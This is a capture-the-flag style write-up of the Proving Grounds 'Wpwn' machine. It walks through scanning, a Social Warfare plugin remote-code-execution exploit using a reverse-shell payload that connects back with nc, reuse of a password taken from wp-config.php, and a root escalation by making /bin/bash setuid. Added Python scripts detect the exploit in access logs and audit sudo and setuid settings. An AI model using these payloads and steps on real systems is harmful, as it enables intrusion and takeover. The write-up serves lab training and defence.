OSCP - Proving Grounds - Wpwn
Key points
- Path brute-forcing
- WordPress plugin RCE
- Plaintext password
- sudo privilege escalation
Detailed steps
Information gathering
nmap scan
Fairly straightforward: only ports 22 and 80 are open.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
nikto scan
Found robots.txt and the wordpress path, but robots.txt turned out to be worthless.
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.151.123
+ Target Hostname: 192.168.151.123
+ Target Port: 80
+ Start Time: 2025-04-27 19:23:06 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
+ /wordpress/wp-admin/: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ /wordpress/: Drupal Link header found with value: <http://192.168.151.123/wordpress/index.php/wp-json/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /wordpress/: A Wordpress installation was found.
+ /wordpress/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wordpress/wp-content/uploads/: Directory indexing found.
+ /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
+ /wordpress/wp-login.php: Wordpress login found.
+ 8102 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2025-04-27 20:14:56 (GMT-4) (3110 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
wpscan
Running wpscan reveals a vulnerable plugin, social-warfare, in the results.
[i] Plugin(s) Identified:

[+] social-warfare
 | Location: http://192.168.151.123/wordpress/wp-content/plugins/social-warfare/
 | Last Updated: 2025-03-18T09:37:00.000Z
 | [!] The version is out of date, the latest version is 4.5.6
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Comment (Passive Detection)
 |
 | [!] 8 vulnerabilities identified:
 |
 | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update
 |     Fixed in: 3.5.3
 |     References:
 |      - https://wpscan.com/vulnerability/32085d2d-1235-42b4-baeb-bc43172a4972
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9978
 |      - https://wordpress.org/support/topic/malware-into-new-update/
 |      - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
 |      - https://threatpost.com/wordpress-plugin-removed-after-zero-day-discovered/143051/
 |      - https://twitter.com/warfareplugins/status/1108826025188909057
 |      - https://www.wordfence.com/blog/2019/03/recent-social-warfare-vulnerability-allowed-remote-code-execution/
 |
Initial foothold
Getting a www-data shell
Follow the description in this write-up: Social Warfare <= 3.5.2 – Unauthenticated Remote Code Execution (RCE) | Plugin Vulnerabilities
Create payload.txt in the local working directory with the following content:
system('rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.217 443 >/tmp/f')
Start a local web server and nc -nlvp 443, then visit http://192.168.151.123/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.45.217:8000/payload.txt
This returns a reverse shell; the first flag can also be read from /var/www.
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.151.123] 37504
bash: cannot set terminal process group (517): Inappropriate ioctl for device
bash: no job control in this shell
www-data@wpwn:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
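From the defender's side, the request above leaves a very specific trace in the web server log: a hit on admin-post.php with swp_debug=load_options and an swp_url pointing at a remote host (the CVE-2019-9978 pattern listed by wpscan). The following Python script is an added example, not part of the original write-up; it parses Apache combined-format access-log lines and flags that pattern. The log lines are constructed samples, and the second attacker host, user agents and byte counts in them are assumptions.

```python
"""Flag Social Warfare <= 3.5.2 (CVE-2019-9978) exploitation attempts in Apache access logs.

Added example, not part of the original write-up. The log lines below are
constructed to mirror the request shape used on this box.
"""
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
192.168.45.217 - - [27/Apr/2025:20:20:01 -0400] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.45.217:8000/payload.txt HTTP/1.1" 200 512 "-" "curl/8.5.0"
10.0.0.5 - - [27/Apr/2025:20:21:10 -0400] "GET /wordpress/wp-login.php HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
10.0.0.6 - - [27/Apr/2025:20:22:45 -0400] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http%3A%2F%2Fevil.example%2Fx.txt HTTP/1.1" 200 300 "-" "python-requests/2.31"
10.0.0.7 - - [27/Apr/2025:20:23:00 -0400] "GET /wordpress/wp-admin/admin-post.php?action=heartbeat HTTP/1.1" 200 50 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, identity, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return a dict of fields for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_swp_url(target):
    """Return the swp_url value when the request is admin-post.php?swp_debug=load_options
    with a remote (http/https) swp_url, else None. parse_qs percent-decodes the value."""
    url = urlparse(target)
    if not url.path.endswith("/wp-admin/admin-post.php"):
        return None
    qs = parse_qs(url.query)
    if qs.get("swp_debug", [""])[0] != "load_options":
        return None
    swp_url = qs.get("swp_url", [""])[0]
    return swp_url if swp_url.lower().startswith(("http://", "https://")) else None


def find_hits(log_text):
    """Return (client ip, swp_url, status) tuples for every line matching the pattern."""
    hits = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if not fields:
            continue
        swp_url = remote_swp_url(fields["target"])
        if swp_url is not None:
            hits.append((fields["ip"], swp_url, int(fields["status"])))
    return hits


if __name__ == "__main__":
    for ip, url, status in find_hits(SAMPLE_LOG):
        print(f"ALERT swp_debug=load_options from {ip} loading options from {url} (HTTP {status})")
```

A 200 on such a request means the plugin fetched and evaluated the remote file, so the host should be treated as compromised rather than merely probed; the fix on the page's own timeline is the plugin update to 3.5.3 or later.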
Privilege escalation
Getting the takis user
Next, upload linpeas to help enumerate the Linux host.
It finds a rather useful database configuration file that contains a password.
www-data@wpwn:/tmp$ cat /var/www/html/wordpress/wp-config.php
cat /var/www/html/wordpress/wp-config.php
......
......
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'wp_user' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
After some trial and error, it turns out this password is reused by the takis user.
www-data@wpwn:/tmp$ su takis
su takis
Password: R3&]vzhHmMn9,:-5
id
uid=1000(takis) gid=1000(takis) groups=1000(takis),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
And this user can run sudo without a password:
sudo -l
Matching Defaults entries for takis on wpwn:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User takis may run the following commands on wpwn:
    (ALL) NOPASSWD: ALL
So privilege escalation is immediate:
sudo chmod +s /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
/bin/bash -p
id
uid=1000(takis) gid=1000(takis) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(takis)
cat /root/proof.txt
1c7593989911e8bc71c50609491b6166
cat /var/www/local.txt
4c07c5f1165c40d6be363891b297dca4
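Two misconfigurations made the escalation trivial: an unrestricted (ALL) NOPASSWD: ALL rule for takis, and, once used, a setuid-root /bin/bash that persists as a backdoor after the session ends. The following Python audit script is an added example, not part of the original write-up; it parses text in the shape of the sudo -l and ls -l output above and flags both conditions, so it can be run offline over collected output. The sudo -l sample is taken from this page; the extra ls -l lines for /bin/ls and /usr/bin/passwd are constructed.

```python
"""Audit for passwordless unrestricted sudo and setuid-root shell binaries.

Added example, not part of the original write-up. It parses text in the shape
of `sudo -l` and `ls -l` output so it runs offline on the constructed samples.
"""
import re

# Sample `sudo -l` output as printed for takis on this box.
SUDO_L_SAMPLE = """\
Matching Defaults entries for takis on wpwn:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User takis may run the following commands on wpwn:
    (ALL) NOPASSWD: ALL
"""

# Constructed `ls -l` lines: the first mirrors the page, the others are ordinary binaries
# (passwd is legitimately setuid but is not a shell).
LS_SAMPLE = """\
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
-rwxr-xr-x 1 root root  138000 Apr 18  2019 /bin/ls
-rwsr-xr-x 1 root root   63000 Apr 18  2019 /usr/bin/passwd
"""

# A sudoers rule line as echoed by `sudo -l`: "(runas) TAG: TAG: commands"
SUDO_RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$')


def parse_sudo_l(text):
    """Return (runas, [tags], commands) tuples for the rule lines of `sudo -l` output."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = SUDO_RULE_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            rules.append((m.group("runas").strip(), tags, m.group("cmds").strip()))
    return rules


def unrestricted_nopasswd(rules):
    """True if any rule allows ALL commands as root (or ALL) with the NOPASSWD tag."""
    for runas, tags, cmds in rules:
        runas_user = runas.split(":")[0].strip()
        if "NOPASSWD" in tags and cmds == "ALL" and runas_user in ("ALL", "root"):
            return True
    return False


SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}


def setuid_shells(ls_text):
    """Return paths from `ls -l` lines that are root-owned, setuid, and named like a shell."""
    found = []
    for line in ls_text.splitlines():
        parts = line.split()
        if len(parts) < 9:
            continue
        mode, owner, path = parts[0], parts[2], parts[-1]
        # mode[3] is the owner-execute slot; 's' or 'S' there means the setuid bit is set.
        if owner == "root" and mode[3] in "sS" and path.rsplit("/", 1)[-1] in SHELLS:
            found.append(path)
    return found


if __name__ == "__main__":
    if unrestricted_nopasswd(parse_sudo_l(SUDO_L_SAMPLE)):
        print("FINDING: unrestricted NOPASSWD sudo rule present")
    for path in setuid_shells(LS_SAMPLE):
        print(f"FINDING: setuid-root shell at {path}")
```

On a live host the same checks run against `sudo -l -U <user>` from root and `find / -perm -4000 -user root -exec ls -l {} +`; a setuid shell found this way should be reverted with chmod u-s,g-s and the sudoers rule narrowed to the specific commands the account needs.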